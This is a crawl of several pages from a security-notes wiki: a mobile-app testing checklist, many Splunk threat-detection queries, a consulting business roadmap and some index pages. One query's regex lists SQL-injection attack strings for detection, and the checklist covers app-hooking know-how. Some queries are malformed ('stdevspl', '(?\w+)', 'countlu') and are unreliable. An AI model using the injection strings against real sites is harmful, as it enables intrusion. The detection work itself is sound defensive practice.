Sales](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#crm-and-sales) * [Marketing & Email Automation](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#marketing-and-email-automation) * [E-Commerce & POS](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#e-commerce-and-pos) * [Accounting & Finance](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#accounting-and-finance) * [HR & Payroll](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#hr-and-payroll) * [Project Management & Collaboration](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#project-management-and-collaboration) * [Helpdesk & Support](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#helpdesk-and-support) * [Knowledge Management & Docs](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#knowledge-management-and-docs) * [Team Communication](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#team-communication) * [CMS & Website Builders](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#cms-and-website-builders) * [Automation & Integration](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#automation-and-integration) * [Security & Password Management](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#security-and-password-management) * [AI, Low-Code & Emerging Tools](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools#ai-low-code-and-emerging-tools) --- # SAST/SCA | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca.md) . [How to setup a GitHub Action for Code Security analysis](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/how-to-setup-a-github-action-for-code-security-analysis) [JavaScript Security Analysis](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/javascript-security-analysis) [Java Security 101](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/java-security-101) [Tools](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/static-code-analysis) [CodeQL for Beginners](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/codeql-for-beginners) [PreviousHow to Dockerize Applications with Docker Compose (Using SQLite and Flask)](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops/docker/how-to-dockerize-applications-with-docker-compose-using-sqlite-and-flask) [NextHow to setup a GitHub Action for Code Security analysis](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/how-to-setup-a-github-action-for-code-security-analysis) Last updated 1 year ago --- # Mobile Checklist | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#setup-and-environment-preparation) **Setup and Environment Preparation:** * Set up a controlled environment: Use emulators (like Android Studio's emulator for Android or Corellium for iOS) or real devices. * Install necessary tools for mobile analysis (e.g., adb for Android, Cydia for jailbroken iOS). ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#initial-assessment) **Initial Assessment:** * Identify the type of application (Android APK or iOS IPA). * Install the application on your device or emulator. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#static-analysis) **Static Analysis:** * For Android: * Decompile the APK using tools like apktool or jadx. * Review the manifest file for permissions, activities, services, and receivers. * Examine the decompiled source for sensitive information (API keys, URLs, etc.). * For iOS: * Extract the IPA contents and analyze plist files. * Use tools like class-dump to understand the class structures. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#dynamic-analysis) **Dynamic Analysis:** * Monitor and analyze the app's runtime behavior. * Use tools like Frida or Objection for hooking into running processes and manipulating function calls and data. * Monitor network traffic with Wireshark or Burp Suite. **Data Storage Analysis:** * Check how the application stores data locally. * For Android, examine SQLite databases, shared preferences, or files in the app's directory. * For iOS, inspect SQLite databases, plist files, and the Keychain. **Reverse Engineering and Code Analysis:** * Analyze the code for vulnerabilities such as hard-coded secrets, insecure communication, or improper validation checks. * Reverse engineer any custom algorithms or obfuscated code. **Network Analysis:** * Intercept and analyze network traffic to understand API calls. * Look for insecure API endpoints, data leakage, or hard-coded API keys. **Cryptanalysis (if applicable):** * Identify and analyze the usage of cryptographic functions. * Test for weak or broken cryptography. **Authentication and Session Management Testing:** * Test for broken authentication mechanisms. * Analyze session management for vulnerabilities. **Client-side Analysis:** * Inspect client-side validation routines. * Test for client-side injection vulnerabilities (e.g., JavaScript or SQL injection). **Permissions and Exposures:** * Review the app’s permissions for any unnecessary access. * Check for exposed content providers (Android) or URL schemes (iOS). **Reporting and Documentation:** * Document your findings, including how vulnerabilities can be exploited and potential mitigation strategies. * Prepare a detailed report if required. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#cleanup) **Cleanup:** * After analysis, ensure to remove the application and any associated data from your testing environment. [PreviousMagic Bytes](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/reverse-engineering-checklist/magic-bytes) [NextForensics Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist) Last updated 6 months ago * [Setup and Environment Preparation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#setup-and-environment-preparation) * [Initial Assessment:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#initial-assessment) * [Static Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#static-analysis) * [Dynamic Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#dynamic-analysis) * [Cleanup:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/mobile-checklist#cleanup) --- # Dashboards | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk/dashboards.md) . [](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk/dashboards#splunk-dashboards) Splunk Dashboards ---------------------------------------------------------------------------------------------------------------------------- IPS High Risk Alert Not Blocked. Below is an example using Palo Alto Networks (PAN) IPS Copy index=pan sourcetype="pan:threat" ",threat," (critical OR high) (severity=critical OR severity=high) action!="blocked" action!="dropped" | bucket span=1h _time | stats values(signature) as signature mode(dest) as dest values(dest_port) as dest_port values(file_name) as file_name values(file_hash) as file_hash count by _time, src, severity, action | eval signature=mvjoin(signature," , ") | eval dest_port=mvjoin(dest_port," , ") | eval file_name=mvjoin(file_name," , ") | eval file_hash=mvjoin(file_hash," , ") DOS- Firewall Large number of DENIED Connections by Firewall Copy | tstats summariesonly=1 allow_old_summaries=1 count from datamodel=Network_Traffic.All_Traffic where All_Traffic.action="blocked" sourcetype=* AND host=* by All_Traffic.dvc host _time span=1h | rename All_Traffic.dvc AS dvc | eval dvc=if(dvc="unknown",host,dvc) | timechart span=1h sum(count) by dvc Detect Many Unauthorized Access Attempts Copy | `Load_Sample_Log_Data(Windows Logons with Failure Codes)` | search Failure_Reason=* Status=0xC000015B Data Exfiltration - Suspicious Destinations Copy | tstats summariesonly=1 allow_old_summaries=1 sum(All_Traffic.bytes) as bytes dc(All_Traffic.src) as "Unique Sources" from datamodel=Network_Traffic.All_Traffic where host=* by _time span=1h All_Traffic.dest | rename All_Traffic.* as * | eval MBytes=round(bytes/1024/1024,2) | eventstats dc(_time) as Frequency by dest | eval Risk=round(MBytes/(pow(Frequency,Frequency))/'Unique Sources') | sort - Risk | head 250 | iplocation dest | fillnull value="" Country | table _time, Risk, dest, "Unique Sources", MBytes, Country Detects when the number of successful Windows logon events are more than the daily average for a user account Unusual Traffic by Volume Suspiciously High Process Creation Network Traffic from Rare Countries Failed Login Attempts from a Single Source Frequency of Rare Windows Events Detection of SQL Injection Top Accessed Internal Systems Anomaly in Number of Connections to a Host Unique Domains Requested by Host Suspicious Executables Downloaded Unusual Increase in Network Traffic Unexpected System Changes Unknown Processes Running on Critical Servers Unusual Database Activities Failed Connections to Important Services High Traffic on Non-Standard Ports Connections to Blacklisted IPs Multiple VPN Logins from Same User but Different Locations File Access Patterns Attempts to Access Unusual URLs Outgoing Traffic To Blacklisted Domains Unique Connections by Non-Standard Ports Spike in Error Logs Longest Running User Sessions Suspicious Database Transactions Unknown USB Device Connections Multiple Failed SSH Attempts Most Common Firewall Deny Events Processes Consuming High CPU Rarely Accessed File Shares DNS Tunneling Detection Malware Detection Based on User Agent Strings File Changes on Critical Systems Abnormal Account Lockouts Excessive Data Sent to External IPs Unusual Server Reboot Suspicious PowerShell Commands Multiple File Changes by a User Inbound Connections from TOR Network Unusual Print Activities User Account Anomalies Unusual Command Execution Outbound Traffic to High-Risk Countries Large Number of Failed Database Queries Unusual System Service Behavior Uncommon Firewall Rule Modifications Large Number of Login Failures from Single IP Suspicious File Access Patterns Abnormal Process Behavior Outliers in Network Bandwidth Usage [PreviousBasic Queries](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk/basic-queries) [NextForensics](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics) Last updated 1 year ago Copy index=windows EventCode=4624 | eval user=lower(Account_Name) | timechart span=1d avg(count) as daily_avg by user | where count > daily_avg Copy index=firewall sourcetype=access_combined | bucket span=1h _time | stats sum(bytes_out) as sum_bytes by _time, src_ip | streamstats avg(sum_bytes) as avg stdev(sum_bytes) as stdev by src_ip | eval isOutlier=if(sum_bytes > (avg + (4*stdev)), 1, 0) | search isOutlier=1 Copy index=os_logs sourcetype=WinEventLog:Security EventCode=4688 | timechart span=1h count as process_start by host | where process_start > avg(process_start)*2 Copy index=firewall | iplocation src_ip | stats count by Country | eventstats sum(count) as total | eval percentage=(count/total)*100 | where percentage < 1 Copy index=authentication sourcetype="linux_secure" | search failed password | stats count by src_ip | eventstats avg(count), stdev(count) | where count > avg(count) + 4*stdev(count) Copy index=wineventlog | stats count by EventCode | eventstats sum(count) as total | eval percentage=(count/total)*100 | where percentage < 1 | sort - percentage Copy index=web sourcetype=access_combined action=200 uri="*.php*" | rex field=uri "(?i)(union select|select(.+)from|waitfor delay|' OR ')" | search uri=* | table _time, clientip, uri Copy index=firewall action=success | top limit=20 src_ip | table _time, src_ip, count Copy index=network sourcetype=cisco:asa dest_ip=* | bucket _time span=1h | stats count by _time, dest_ip | eventstats avg(count) as avg stdev(count) as stdev by dest_ip | eval isOutlier=if(count > (avg + (4*stdev)), 1, 0) | search isOutlier=1 Copy index=dns_logs | stats dc(query) as unique_domains by src_ip | eventstats avg(unique_domains) as avg stdev(unique_domains) as stdev | where unique_domains > avg + 4*stdevspl Copy index=proxy_logs action=download status=200 | rex field=file_path "\.(?\w+)$" | where file_extension IN ("exe", "dll", "bat", "ps1") | stats count by src_ip, file_path Copy index=network_logs | bucket _time span=1h | stats sum(bytes) as sum_bytes by _time | streamstats avg(sum_bytes) as avg stdev(sum_bytes) as stdev | eval isOutlier=if(sum_bytes > (avg + (4*stdev)), 1, 0) | search isOutlier=1 Copy index=syslog_changes sourcetype=syslog | stats values(change) as changes by host, user | search changes=* AND changes!=expected_value Copy index=server_logs server=critical_server | stats values(process_name) as process_list by user | search process_name NOT IN (list_of_known_processes)spl Copy index=db_logs action=insert OR action=delete | timechart span=1h count by action | where count > avg(count)*2 Copy index=network_logs sourcetype=cisco:asa action=failure service=important_service | stats count by src_ip, dest_ip | sort - count Copy index=network_logs | where NOT (port IN (80, 443, 21, 22)) | stats sum(bytes) as total_bytes by port | sort - total_bytes Copy index=firewall_logs | lookup ip_blacklist.csv ip as dest_ip OUTPUT description as threat_type | where isnotnull(threat_type) Copy index=vpn_logs | iplocation src_ip | stats count by user, Country | where count > 1 Copy index=filesystem_logs action=accessed | stats count by user, file_path | eventstats avg(count) as avg, stdev(count) as stdev by file_path | where count > avg + 4*stdev Copy index=web_logs sourcetype=access_combined status=404 | top limit=10 uri | table _time, uri, count Copy index=proxy_logs NOT [inputlookup domain_blacklist.csv] | top limit=20 src_ip | table _time, src_ip, count Copy index=network_logs NOT (port IN (80, 443, 21, 22)) | stats dc(dest_ip) as unique_connections by src_ip, port | where unique_connections > 20 Copy index=system_logs level=error | timechart span=1h count as error_count | where error_count > avg(error_count) + 4*stdev(error_count) Copy index=system_logs level=error | timechart span=1h count as error_count | where error_count > avg(error_count) + 4*stdev(error_count) Copy index=db_logs action=transaction | stats sum(amount) as total_amount by user | where total_amount > avg(total_amount) + 4*stdev(total_amount) Copy index=device_logs sourcetype=usb:* | search NOT [inputlookup known_devices.csv] | table _time, device_id, host Copy index=ssh_logs eventtype=ssh_failure | stats count by src_ip | where count > 5 Copy index=firewall_logs action=deny | top limit=10 src_ip | table _time, src_ip, count Copy index=system_logs sourcetype=top:CPU | where percent_cpu > 80 | table _time, process_name, percent_cpu Copy index=sharepoint_logs | stats count by file_path | where count < 5 | table _time, file_path, count Copy index=dns_logs | stats count by src_ip, query | where count > 100 | table _time, src_ip, query, count Copy index=proxy_logs | search [inputlookup malware_user_agents.csv] | table _time, src_ip, user_agent Copy index=filesystem_logs host=critical_system | stats count by file_path | where count > 10 | table _time, file_path, count Copy index=authentication_logs eventtype=account_lockout | stats count by user | where count > avg(count) + 4*stdev(count) Copy index=firewall_logs direction=outbound | stats sum(bytes) as total_bytes by dest_ip | where total_bytes > 1000000 | table _time, dest_ip, total_bytes Copy index=system_logs eventtype=system_reboot | stats count by host | where count > avg(count) + 4*stdev(count) Copy index=powershell_logs | search [inputlookup suspicious_powershell_commands.csv] | table _time, user, command Copy index=file_change_logs | stats count by user, file_path | where count > 5 | table _time, user, file_path, count Copy index=firewall_logs direction=inbound | lookup tor_exit_nodes.csv src_ip OUTPUT description as threat_type | where isnotnull(threat_type) Copy index=printer_logs | stats count by user, printer_name | where count > avg(count) + 4*stdev(count) | table _time, user, printer_name, countlu Copy index=authentication_logs | stats count by user | eventstats avg(count) as avg stdev(count) as stdev by user | where count > avg + 3*stdev | table _time, user, count Copy index=command_logs | stats count by user, command | where count > 10 | table _time, user, command, count Copy index=network_logs direction=outbound | iplocation dest_ip | stats count by dest_country | where count > 100 | table _time, dest_country, count Copy index=database_logs status=failed | stats count by user, query | where count > 50 | table _time, user, query, count Copy index=system_logs sourcetype=service_logs | stats count by service_name | where count > 100 | table _time, service_name, count Copy index=firewall_logs eventtype=rule_change | stats count by user, rule_name | where count > 5 | table _time, user, rule_name, count Copy index=authentication_logs | stats count by src_ip | where count > 20 | table _time, src_ip, count Copy index=file_access_logs | stats count by user, file_path | where count > 10 | table _time, user, file_path, count Copy index=process_logs | stats count by process_name | where count > 100 | table _time, process_name, count Copy index=network_logs | timechart span=1h sum(bytes) as total_bytes by src_ip | eventstats avg(total_bytes) as avg stdev(total_bytes) as stdev by src_ip | eval isOutlier=if(total_bytes > (avg + (3*stdev)), 1, 0) | search isOutlier=1 | table _time, src_ip, total_bytes --- # Consulting | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting.md) . ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#consider-your-skills-workstyle-and-lifestyle) **Consider your skills, workstyle and lifestyle** **Goal:** To feel confident that you have the skills needed to be a successful consultant, and feel comfortable that you can make the necessary professional and personal life adjustments. **Questions to ask:** * How do my skills and abilities lend themselves to consulting? * What support systems are currently available to me? * What is my desired work style? * What is my desired lifestyle? * How will my changed lifestyle affect other members of my household? My personal and family finances? * Does my financial situation support consulting? ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#explore-consulting) Explore Consulting **Goal:** Decide that it’s worth the time and effort to take your idea to the next step, or realize that consulting is wrong for you. If you have no prior consulting experience, you may want to look into Internet resources, books, magazines, and workshops. [SCORE](http://score.org/) and the [Small Business Administration](http://sba.gov/) offer very good and free advice. Questions to ask: * What was (is) your greatest challenge? * What worked for you when you started consulting? * What would you do differently? * What do you think of my consulting idea? Is it a viable business idea? * How well do you think consulting fits with my skills? * What do you think will be my greatest challenge? _Note:_ Keep in mind that finding potential clients and actually selling consulting engagements is the biggest single challenge for most first time consultants. Ask them about this specifically. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#create-your-board-of-advisors) Create Your Board of Advisors **Goal:** Line up three to six people who will provide straight advice to you, especially in areas where your skills are less developed. You may meet with your entire board of advisors occasionally, but you will generally call on them individually for specific advice in their area of specialty. Some of your advisors will be paid. You may trade out services with others, and some may provide services free of charge. But make sure that the free advice is worth more than every penny you spend on it. **Questions to ask:** * Does the advisor have experience in an area where I need assistance? * If the advisor charges fees, are they appropriate? * Do I feel comfortable with the advisor? Will the person be objective, willing to say no to unsound ideas, and speak up about tough or critical issues? * Which of the following specialties should I consider for my board of advisors? * accountant * attorney * commercial banker * financial planner * insurance specialist * independent sale representative * marketing consultant * seasoned businessperson * contacts in potential client organizations * strategic associates in other consulting businesses ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#define-your-business) Define Your Business **Goal:** Get three knowledgeable people to agree that your business definition is clear, market appropriate, and potentially viable. **Questions to ask:** * Exactly what consulting services will I offer? * What is my target market (e. g., industries, locations, size) for these services? * Who are my ideal clients (job titles, ages, interests, concerns)? What are their needs? * What will my clients see as the benefits of my services? * What is my USP? How will it motivate these clients? * What will I name my business? Does it reflect my USP? Will it age well with my business? ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#research-the-marketplace) Research the Marketplace **Goal:** Identify at least three potential clients and determine that they might be in the market for your services. **Questions to ask:** * What are some of my target companies/potential clients? Do I have contacts in any of them? Friends? How many? * What are the major trends impacting my clients and my business? What might the future trends be? * What are my clients’ needs? What are their wants? * What do they buy now? What else might they buy? Who do they buy from now? What would it take for me to get business from them? * What do they pay? What will they pay? * When do they buy? Why? * How do they make buying decisions? * How can I get new referrals from my clients? * What is my niche in the market? Is my USP appealing to my prospective clients? * What kind of services do clients expect of me? What kind of services would satisfy or even delight them? ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#search-out-the-competition) Search Out the Competition **Goal:** Identify at least three competitors, know how they compete, and know how you can compete against them. Study competitive information, such as their publications, promotional brochures and websites. If necessary, refine your business definition and unique selling proposition based on the information you have acquired from this research. **Questions to ask:** * What is my competition offering? * How are they positioning their services? What is their sales proposition? * How do they price their services? * How well established are they with their clients? * What are my strengths and weaknesses in comparison? * What is my USP in relation to competition? How do I differentiate my capabilities versus theirs? * Is my USP an effective competitive tool? * If I were the buyer, from whom would I buy? * Is there room in the marketplace for additional competition? ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#set-your-pricing) Set Your Pricing **Goal:** Establish fees that are competitive and in line with your skills and income needs. A rule of thumb in consulting is that at least one-third of your time goes to marketing, sales, preparation, administration, and other non-billable activities. Therefore, count on at least one-third of your time selling and only two-thirds (or less) delivering billable services. With good contacts or a strong reputation, you may need less sales time. On the other hand, if you are starting out cold with no immediate clients, you will be in full time sales initially, with no income. You will want to ease that down to 50%, which is standard in some forms of consulting. **Questions to ask:** * How many billable days will I have (or do I want to have), and what revenue do I need to generate? * What overhead expenses can I anticipate? * How does the rate I calculate compare to the going rate for services like mine? * Will I bill hourly? Daily? By project? * What kind of proposals or quotations are the norm? In what format? How will I cost out estimates and live by them? * What expenses can I pass on to my clients (such as travel, perhaps)? ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#develop-your-business-plan) Develop Your Business Plan **Goal:** A business plan that passes the scrutiny of your board of advisors (or other knowledgeable and objective advisors). A simple business plan for your consulting practice increases your probability of success, because it compels you to articulate the key success factors underlying your business. There are many print and electronic sources available, including actual plan templates. Here are some standard elements of a business plan. You can construct on your own. * **Business definition:** Define your services, target market, and unique selling proposition. * **Fee schedule:** Decide what you will charge, and why. Is there a pricing strategy that needs explanation? Can you charge your customers for results rather than billing for time expended? Can you bill for travel? * **Competition:** Know who else your prospective clients are likely to consider as alternatives to you. What are your competitors’ strengths and how will you counter them? What are their weaknesses and how will you exploit them? * **Marketing and sales strategy:** Decide how you will communicate with prospective clients — using the market positioning you have selected — and how you will convert them and close the sale. * **Implementation schedule:** Scope out what you need to do to get your practice operational. * **Revenue, expense and cash flow projections:** You may want to run these numbers, just as you would for any new venture. But know that they will change. **Questions to ask:** * Does your business idea require funding? If it does, you’ll need revenue, expense, and cash flow projections over the period of the loan. * Does your business definition, target market, and unique selling proposition stand out clearly? If the language is vague, murky, loaded with euphemisms, you need to revise it. Get others to read it and (forthrightly) comment on it. * How will you compete in your chosen market? On what basis? How are your services differentiated from your competition? What are the key factors that will drive your success? * Ask yourself: would I invest in the business summarized in this plan? Get members of your advisory board review it and ask the same question. Even if there’s little monetary risk, you are planning to make a major investment of your time and energy. Objectively, it should look like the right move to you, and to others. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#establish-business-systems-and-processes) Establish Business Systems and Processes **Goal:** Establish adequate systems and procedures to get started, and know what you’ll add on as you are able. Even a small consulting business needs systems and procedures, and the earlier you establish yours, the more prepared you will be to manage your consulting practice effectively. You should have systems and processes that track your sales efforts, work projects, and finances in a systematic way, week to week, month to month and year to year. To ensure peace of mind and avoid problems with the IRS, meet with an accountant before you launch the business to determine if it will operate on a cash or accrual basis, set up systems and processes to manage the finances of your business. Establish a chart of accounts to identify and track expenses. Get your accountant's guidance on expenses (such as professional memberships and subscriptions) that might legitimately be run through your business. Open a business bank account. And consider purchasing some software (suggestions listed below) to keep your affairs straight. You should also consult with an attorney on the forms of business organization (sole proprietorship, limited liability corporation, etc.), and on liability and any other issues that may be relevant. Consider whether you need insurance, such as Errors and Omissions coverage. Will you need a website and help putting it together? Will you need a license to do business in the city or town where your business is located? Do you need to register your business and its name with the state, city or county clerk? Many consultants start their businesses in a bedroom, but move to professional space when they can afford to. If you do not have an office appropriate to the consulting practice you have in mind, work on securing that space, and the necessary equipment and supplies. Your board of advisors (or the consultants you contacted earlier) may help you with space and equipment decisions. They may also know where to get good prices on equipment and low cost space. The following are some considerations. Establish systems and processes, such as: * Recordkeeping, billing, project planning * Correspondence, proposal development, mailings (print or electronic) * Financial statements, tax records, cash flow * Benefits (e. g., health insurance, disability, retirement accounts) * Submit any required filings, and obtain any required licenses, permits, and insurance * Acquire the necessary equipment and supplies, such as furniture, computer, printer, Internet service provider, telephone(s), wireless capability, stationery, business cards, and office supplies. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#market-and-sell-your-services) Market and Sell Your Services **Goal:** Get a paying client, then get more Since you will need to contact prospects several times, it is important to develop a systematic way of communicating with them so they get to know your name and the nature of your business. You may also wish to use contact management software. A consistent, systematic approach to sales is the best way to expand your client base. Your marketing materials should not just describe your business, but must speak to your clients’ needs. Like all communications, including your proposals, your marketing materials should clearly convey your unique selling proposition, and how this distinguishes you from competition. But as good as your marketing materials are, the only thing that really matters is closing the sale. You know your services are good, but... * Can you convince a prospective client? * Can you resist the temptation to give away solutions before you close the sale? * Can you overcome your client’s fear or resistance that blocks them from using you as a consultant? * Can you ask for the order? **Questions to ask:** * What marketing materials do I need? (Possibilities: business cards, stationery, brochures, mailers, service descriptions, interactive website, portfolio, work samples, references, client list, case studies/success stories, your biography, proposal formats) * How will I promote my business? (Possibilities: seeking a leadership position in a professional or industry association, writing articles, speaking engagements, direct mail, advertising, website) * What marketing and sales methods will I use? (Possibilities: networking for information, leads, referrals and introductions, telemarketing, making sales calls and presentations) * Do I know how to close a sale? ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#networking-to-make-good-career-choices) Networking to Make Good Career Choices There are a number of methods available for obtaining the career information you need to make good career choices. Libraries and the Internet are usually a good starting point. But it's important to move beyond them to real-time conversations with knowledgeable people. Networking is an essential intelligence-gathering activity: * **Talk to personal contacts.** Identify friends and colleagues who might have knowledge of your skills and of the kind of work you've been doing. Ask about other professions in which they see you working in the future. * **Talk to contacts in your industry.** Select two or three professional contacts inside your industry. Ask them what they believe the market is like for people who do what you do. Ask them to help you assess how up-to-date you are in your own skills. Talk with them about their views on the long-term viability of your profession. Ask them to help you understand what opportunities might exist for people with your skills at both larger and smaller organizations than the one you've just come from. Ask about other professions in which they see you working in the future. * **Talk to contacts in other industries.** Locate two or three professional contacts outside your industry. Ask how the work you've been doing is performed in their industry. Ask about the skills and backgrounds of people who perform that kind of work in their industry. Ask them to help you assess the impact that technology has had (or will have) on your profession. Ask about other professions in which they see you working in the future. * **Explore possible new professions.** Ask your personal and professional contacts to introduce you to people who are currently in a new profession that you might be considering. Ask those people about the state of their profession, how it is changing, how technology is impacting it. Talk to them about the "barriers to entry" and what would be required for you to "get from here to there." Talk to them about the everyday experience of their work. Ask them to help you assess what roadblocks you might face in making the transition and what you might be surprised to learn once you got there. * **Use professional associations.** Contact the association that focuses on your profession or the profession you're considering. Ask them what kinds of materials they publish. Many do annual "state-of-the-profession" surveys, which can be extremely valuable to job seekers who are trying to get conversant in the challenges facing their own profession, or to learn about a new profession. ### [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#networking-to-obtain-salary-information) Networking to obtain salary information Using your network is a good way to obtain salary information. Here are four thought-starters. * Identify friends and colleagues who might have knowledge of the kind of job you're targeting. Ask them what they believe the market can bear for a particular job. People may be uncomfortable talking about you personally. Instead, describe the job you're considering and the skills it requires. Ask them if they've ever used an online salary calculator that they thought was fairly accurate - if so, which one? * Ask your professional contacts what they believe the market can bear for a particular job. Ask them what sources of salary information or benchmarks they use to determine fair range when they have a need to fill a position. * Ask your professional contacts how salaries in a particular industry or at a specific company compare to the norm. Gather intelligence from your contacts about overall compensation-not just salary patterns-in your target industry or company. This kind of information will help you formulate your negotiation strategy later on. * Contact the professional or industry association whose members have the kind of job you are targeting (it may not be the one to which you currently belong). Ask them if they publish a salary survey. If they don't, ask them who does. This technique yields results almost every time! [PreviousEntrepreneurship Roadmaps](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps) [NextStarting a Business](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business) Last updated 1 year ago * [Consider your skills, workstyle and lifestyle](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#consider-your-skills-workstyle-and-lifestyle) * [Explore Consulting](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#explore-consulting) * [Create Your Board of Advisors](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#create-your-board-of-advisors) * [Define Your Business](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#define-your-business) * [Research the Marketplace](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#research-the-marketplace) * [Search Out the Competition](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#search-out-the-competition) * [Set Your Pricing](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#set-your-pricing) * [Develop Your Business Plan](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#develop-your-business-plan) * [Establish Business Systems and Processes](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#establish-business-systems-and-processes) * [Market and Sell Your Services](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#market-and-sell-your-services) * [Networking to Make Good Career Choices](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#networking-to-make-good-career-choices) * [Networking to obtain salary information](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting#networking-to-obtain-salary-information) --- # Cheatsheets | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets.md) . This section collects curated **Hack The Box (HTB) Academy** cheatsheets designed to complement the Academy’s practical cybersecurity learning modules. These guides summarize key commands, workflows, and methodologies from core training topics, enabling students to quickly reference essential material during exercises or real-world penetration testing. Each cheatsheet is derived from official HTB Academy content and is structured for clarity, conciseness, and ease of command-line use. [PreviousVulnerability Management Lifecycle](https://martian1337.gitbook.io/notes/notes/governance-risk-compliance/vulnerability-management-lifecycle) [NextWeb Security Testing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing) Last updated 7 months ago --- # Accessing Tor | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/opsec/accessing-tor.md) . **Overview:** The Tor Project designs the Tor Browser specifically to prevent fingerprinting and leaks. Using it 